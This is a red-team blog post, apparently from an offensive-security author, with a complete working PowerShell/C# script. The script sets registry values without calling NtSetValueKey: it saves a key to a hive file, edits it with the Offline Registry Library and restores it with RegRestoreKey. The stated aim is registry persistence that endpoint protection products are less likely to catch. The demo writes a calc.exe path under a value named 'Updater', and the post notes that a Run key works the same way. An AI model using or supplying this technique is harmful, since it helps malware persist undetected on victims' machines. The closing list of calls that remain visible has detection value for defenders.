
Most #EPP (Endpoint Protection Platform) products provide some kind of dynamic monitoring: sandboxing, emulation, hooking, etc. They watch when an application calls a library function (CreateFile from kernel32) or issues a syscall directly (mov rax, xxx; syscall), and the product's detection logic decides whether the sample is flagged or allowed to continue execution.

If your sample calls RegSetValue/RegSetValueEx or the lower-level NtSetValueKey, it is highly likely that the #EPP product you are targeting monitors those calls, because they are typically used to achieve persistence via the Registry.

There is a way to achieve the same goal without using NtSetValueKey at all. Windows provides the Offline Registry Library (offreg.dll, shipped with the Windows SDK), which can be used to modify a registry hive file outside of the active system registry.

We can use RegSaveKey/RegSaveKeyEx or NtSaveKey/NtSaveKeyEx to save the target key to a hive file, open that file with OROpenHive and use ORSetValue to set the desired value in the offline key.

After saving the modified hive with ORSaveHive, calling RegRestoreKey replaces the target key with the contents of the edited file.
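The full round trip, as an added example that is not code from the original post: save a demo key with RegSaveKeyEx, set a REG_SZ value in the hive file through offreg.dll, and write it back with RegRestoreKey. The key path, value name and data, and the temp file names are my own demo choices, and offreg.dll is assumed to be on PATH or next to the script. Run it elevated: RegSaveKeyEx needs SeBackupPrivilege and RegRestoreKey needs SeRestorePrivilege, and both privileges have to be enabled on the token first.

```powershell
# Added example (not from the original post). Sets a value without ever calling
# RegSetValue*/NtSetValueKey: live key -> hive file -> offreg edit -> RegRestoreKey.
# Assumptions: demo key/value/temp paths are arbitrary; offreg.dll is loadable.
$native = @'
using System;
using System.Runtime.InteropServices;

public static class OffRegDemo
{
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint Count; public LUID Luid; public uint Attributes; }

    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] public static extern bool LookupPrivilegeValueW(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);

    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)] public static extern int RegOpenKeyExW(IntPtr hKey, string subKey, uint options, uint sam, out IntPtr result);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)] public static extern int RegSaveKeyExW(IntPtr hKey, string file, IntPtr secAttrs, uint flags);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)] public static extern int RegRestoreKeyW(IntPtr hKey, string file, uint flags);
    [DllImport("advapi32.dll")] public static extern int RegCloseKey(IntPtr hKey);

    // Offline Registry Library: works on the hive file, never touches NtSetValueKey.
    [DllImport("offreg.dll", CharSet = CharSet.Unicode)] public static extern uint OROpenHive(string path, out IntPtr hive);
    [DllImport("offreg.dll", CharSet = CharSet.Unicode)] public static extern uint ORSetValue(IntPtr key, string name, uint type, byte[] data, uint cbData);
    [DllImport("offreg.dll", CharSet = CharSet.Unicode)] public static extern uint ORSaveHive(IntPtr hive, string path, uint osMajor, uint osMinor);
    [DllImport("offreg.dll")] public static extern uint ORCloseHive(IntPtr hive);

    // Backup/restore privileges are present but disabled in an elevated token; enable them.
    public static void EnablePrivilege(string name)
    {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), 0x28 /* TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY */, out token))
            throw new Exception("OpenProcessToken failed: " + Marshal.GetLastWin32Error());
        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES { Count = 1, Attributes = 2 /* SE_PRIVILEGE_ENABLED */ };
        if (!LookupPrivilegeValueW(null, name, out tp.Luid))
            throw new Exception("LookupPrivilegeValue failed: " + Marshal.GetLastWin32Error());
        AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
        // Returns TRUE even if nothing was assigned (ERROR_NOT_ALL_ASSIGNED = 1300), so check last error.
        if (Marshal.GetLastWin32Error() != 0)
            throw new Exception(name + " is not held by this token; run elevated");
    }
}
'@
Add-Type -TypeDefinition $native
$ErrorActionPreference = 'Stop'

$HKCU   = [IntPtr](-2147483647)      # HKEY_CURRENT_USER (0x80000001, sign-extended on x64)
$subKey = 'Software\OffRegDemo'      # demo key (constructed); a Run key would work the same way
$saved  = Join-Path $env:TEMP 'offreg_saved.hiv'
$edited = Join-Path $env:TEMP 'offreg_edited.hiv'
Remove-Item $saved, $edited -ErrorAction SilentlyContinue   # RegSaveKeyEx/ORSaveHive refuse to overwrite
$null = New-Item -Path "HKCU:\$subKey" -Force                # RegCreateKeyEx only; no value is set here

[OffRegDemo]::EnablePrivilege('SeBackupPrivilege')
[OffRegDemo]::EnablePrivilege('SeRestorePrivilege')

$hKey = [IntPtr]::Zero
$rc = [OffRegDemo]::RegOpenKeyExW($HKCU, $subKey, 0, 0xF003F, [ref]$hKey)   # KEY_ALL_ACCESS
if ($rc) { throw "RegOpenKeyEx: $rc" }

# 1. Save the live key to a hive file (REG_STANDARD_FORMAT = 1).
$rc = [OffRegDemo]::RegSaveKeyExW($hKey, $saved, [IntPtr]::Zero, 1)
if ($rc) { throw "RegSaveKeyEx: $rc" }

# 2. Edit the hive offline; the handle from OROpenHive is the hive's root key.
$hive = [IntPtr]::Zero
$rc = [OffRegDemo]::OROpenHive($saved, [ref]$hive)
if ($rc) { throw "OROpenHive: $rc" }
$data = [System.Text.Encoding]::Unicode.GetBytes("C:\Windows\System32\calc.exe`0")  # REG_SZ: NUL-terminated UTF-16
$rc = [OffRegDemo]::ORSetValue($hive, 'Updater', 1, $data, $data.Length)            # REG_SZ = 1
if ($rc) { throw "ORSetValue: $rc" }
$rc = [OffRegDemo]::ORSaveHive($hive, $edited, 6, 1)   # hive format compatible with Windows 6.1 and later
if ($rc) { throw "ORSaveHive: $rc" }
$null = [OffRegDemo]::ORCloseHive($hive)

# 3. Replace the live key with the edited file. REG_FORCE_RESTORE (8) proceeds even if
#    handles are open below the key; the whole subtree is replaced by the file contents.
$rc = [OffRegDemo]::RegRestoreKeyW($hKey, $edited, 8)
if ($rc) { throw "RegRestoreKey: $rc" }
$null = [OffRegDemo]::RegCloseKey($hKey)
Remove-Item $saved, $edited -ErrorAction SilentlyContinue

# Read it back through the normal API: the value exists, but NtSetValueKey was never called.
(Get-ItemProperty "HKCU:\$subKey").Updater
```

Two practical points when testing this: RegRestoreKey overwrites the entire target key with the hive file, so anything written to that key between the save and the restore is lost, and the calls that remain visible to a monitoring product are RegSaveKeyEx/RegRestoreKey (NtSaveKey/NtRestoreKey), the privilege adjustment, and the offreg.dll image load.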

In the end the result is the same: the desired value is set without the sample ever calling NtSetValueKey, and #EPP products are less likely to monitor the Offline Registry Library functions. The price is that RegSaveKey and RegRestoreKey require SeBackupPrivilege and SeRestorePrivilege, so the technique needs an elevated context, and the restore replaces the whole target key with the contents of the file.

whoami: @_qaz_qaz